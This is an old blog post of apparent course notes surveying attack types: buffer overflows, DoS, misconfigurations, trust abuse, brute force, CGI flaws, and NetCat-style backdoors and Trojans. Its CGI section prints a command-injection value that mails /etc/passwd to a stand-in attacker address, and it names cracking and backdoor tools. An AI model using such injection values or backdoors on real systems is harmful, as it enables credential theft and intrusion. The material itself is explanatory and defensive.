Tuesday, February 15, 2011

Attack Types and Vulnerabilities

Introduction

There exist numerous ways to attack a target system. It could be achieved by exploiting known vulnerabilities in software or taking advantage of a badly configured security policy; it could be implemented remotely or internally. The techniques and methods used are likely to vary depending on the target and they should be chosen appropriately having assessed the situation fully. The attack types and vulnerabilities discussed in this module, are:

• Buffer Overflow attacks.

• Denial of Service (DoS) attacks.

• Misconfigurations.

• Abuse of Trust.

• Brute force attacks.

• CGI and WWW services.

• Back doors and Trojans.
 


Buffer Overflow Attacks

Buffer overflows are a favorite exploit for hackers. The vast majority of Microsoft's available patches fix unchecked buffer problems -- but what about applications developed in-house? They are just as susceptible as commercial applications to buffer-overflow attack. It is therefore critical that you understand how they work and perform vulnerability testing on your home-grown applications prior to deployment.


A buffer overflow is an exploit that takes advantage of a program that is waiting on a user's input. There are two main types of buffer overflow attacks: stack based and heap based. Heap-based attacks flood the memory space reserved for a program, but the difficulty involved with performing such an attack makes them rare. Stack-based buffer overflows are by far the most common.

Example
If the sendmail daemon is running with root privileges and contains a buffer overflow, then commands executed via the overflow will provide the attacker with a means of executing commands as root.

Denial of Service (DoS) Attacks

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. The term is generally used with regards to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.

Example
A well known example is the Windows NT Out of Bound attack (OOB), which caused affected systems to produce the “blue screen of death” when sent specific IP packets.
We can expect to see more vulnerable IP stacks appearing as the market focus shifts to embedded Internet enabled devices, where each vendor is using their own implementation of the IP stack.
The Application Level Program Providing the Service Network applications can be vulnerable to denial of service attacks in the same way that operating systems are. If no allowances are made for
unexpected traffic or other input, the application could encounter a condition where it hangs, and can no longer provide the service it was designed for. Poor error handling in the code could lead to the same
result.
If the operating system does not take adequate precautions for extreme conditions, it could be vulnerable to an attack that attempts to exhaust the physical resources available on the system. Several such attacks
have been released which push the CPU to 100 percent utilization, and thereby deny access to other services.

Misconfigurations

Although exploits feature heavily in security related news, far more successful attacks are conducted by abusing common misconfigurations in network services. Network services should
always be configured with a “deny access by default” policy. The
opposite is often the case, which results in a number of services being
vulnerable to malicious attack.
Access controls on network services often lead to further privilege
escalation and eventual compromise of the system. This was illustrated
by the recent successful attack on the Apache web site. The attackers
exploited a poorly configured ftp server, which allowed write access to
the web site. This in turn allowed them to run a script, via the web and
gain remote root access to the system.
By default, certain products, such as Checkpoint's Firewall-1, are
installed with settings that open them up to security vulnerabilities and
have to be specifically reconfigured to ensure their secure operation.

Abuse of Trust

Early networking protocols did not place a lot of emphasis on
encryption and authentication, as they were used in relatively small
networks. As these networks and systems formed part of the Internet, it
became possible to exploit weaknesses in these protocols.
An example is the use of a source IP address as the means of
establishing a trust relationship between two systems. Common attacks
exploit this weakness by spoofing the address of the trusted host and
thereby gain access to the trusting system and its resources. Typical
examples are NFS and the “r” utilities (rsh, rlogin).

Brute Force Attacks

These attacks are aimed at gaining access to a system by repeated
attempts at authentication. Most services that require a username and
password, and have no facility for account lockout, are vulnerable to
this type of attack.
Brute force methods are commonly used to crack password files, as this
can be done reasonably quickly on a local system. Common tools used
in this case are:
• crack - A Unix based program.

• L0phtcrack - A Windows based program.
Attacking network based services can be more time consuming as the
response time will depend heavily on the network load. Tools exist to
crack the following services:
• telnet.
• ftp.
• http.
• CGI logins.
To improve the chances of a successful brute force attack, one part of a
two part authentication is needed. This can be obtained from other
network or system vulnerabilities, e.g. finger or null sessions, or by
“dumpster diving” and other social engineering methods.

Dictionary Attack
Once a username has been established, it is expedient to first try a dictionary based attack which tries words from various dictionaries until a match is found. The dictionaries available vary in size and scope as well as subject. There are specific themes dictionaries available such as Star Wars dictionaries that can be used in conjunction with other information to produce a more targeted attack. 
Failing a dictionary attack, a true brute force method can be followed, which attempts every combination of characters from a known subset until a match is found. This can be very time consuming if this subset is large or if the minimum password length is relatively long.

CGI and WWW Services

As more websites offer interactive services, more CGI and web based vulnerabilities are being uncovered. CGI vulnerabilities fall into three categories:
• Buffer overflow.
• Command execution.
• Subverting client side scripting.

Buffer Overflow
Standard buffer overflow techniques can be applied to CGI scripts.
Since scripts allow for user input, this input could be used to overflow buffers in vulnerable programs. This only affects scripts written in relatively low level languages such as C. Scripts should always perform validation on all user input and internal functions should do sanity checking on the size of buffers. Higher level, and more commonly used scripting languages perform bounds checking on variable and array lengths internally and will consequently not be vulnerable to buffer
overflow attack. Examples of such languages are:
• Java.
• Perl.
• Python.

Command Execution
Scripts written in higher level languages sometimes contain more insidious vulnerabilities than their low level cousins. A common occurrence of this is command execution on the remote machine. This is once again caused by poor input validation. For example, CGI scripts sometimes contain code that executes shell commands such as the Perl

command:
System("mail $email < theTermsAndConditions.txt");
Which is a simple way of mailing a document to a user. In this example the $email variable will contain an email address that was entered in a form on the website. If no input validation is done when the user enters her email address, it will be possible to imbed shell commands into the input field and have them executed by the system call.
hacker@hack.net < /etc/passwd;
Inserting the above value will cause the password file to be mailed to the attacker. As with buffer overflow attacks the level of privilege with which these commands are executed are dependent on the privilege level of the CGI script.

Subverting Client Side Scripting
Client side scripting in the form of Java script or VB script is sometimes used to perform input validation. This has the feature that the user is immediately notified when incorrect data is entered, and doesn’t have to wait for the form to be submitted before receiving feedback.
Input validation done at this level presents serious security flaws, as the client side source code is available and editable by the end user. 
By simply removing the restriction on character sets and input length, buffer overflow and command execution attacks can then be attempted.
Client side input validation should always be used as an added feature to server side validation and should not be considered a replacement.
Very poorly written client side scripts sometimes contain usernames and passwords which can be used to gain access to the system.

Backdoors and Trojans

Trojans and backdoor programs are becoming an increasingly popular method for gaining unauthorized access to remote systems. Backdoors offer the attacker an easy way of accessing a remote system, without having to rely on exploits or other security vulnerabilities.
The simplest backdoors take the form of command shells listening on unusual ports. A commonly used tool is NetCat, which is available on both the Windows and Unix platforms. Once NetCat is installed and listening on port XXXX, the attacker need only telnet to port XXXX and be presented with a remote command shell.

Backdoor and Trojan Development
As intrusion detection and Firewalling technologies have improved, so have the backdoor programs. The simple TCP based remote shell utilities have been superseded by UDP and ICMP based programs that support encrypted data channels. The ability to control these backdoors with UDP packets allows them to be deployed behind firewalls that allow UDP traffic, typically for DNS on port 53. Similarly, if the Firewall in question allows ICMP packets through, these can be used to communicate with the backdoor programs. The use of encrypted data channels means that intrusion detection software can no longer inspect the packet data for signatures, making detection of these backdoors even more difficult.

Deployment
Backdoors can also be deployed on “virgin” systems without having to first compromise them through other means. This can be accomplished by imbedding the backdoor in an email attachment, ActiveX control or a file on the internet. Utilities such as Silkrope and Saranwrap exist, which allow the attacker to attach the Trojan to a seemingly legitimate file.
Well known backdoor programs on the Microsoft Windows platform, include:
• BackOrifice.
• NetBus.

References:
1. http://searchsecurity.techtarget.com/
2. http://en.wikipedia.org 
3. Ethical Hacking: Attacks (PDF)

No comments:

Post a Comment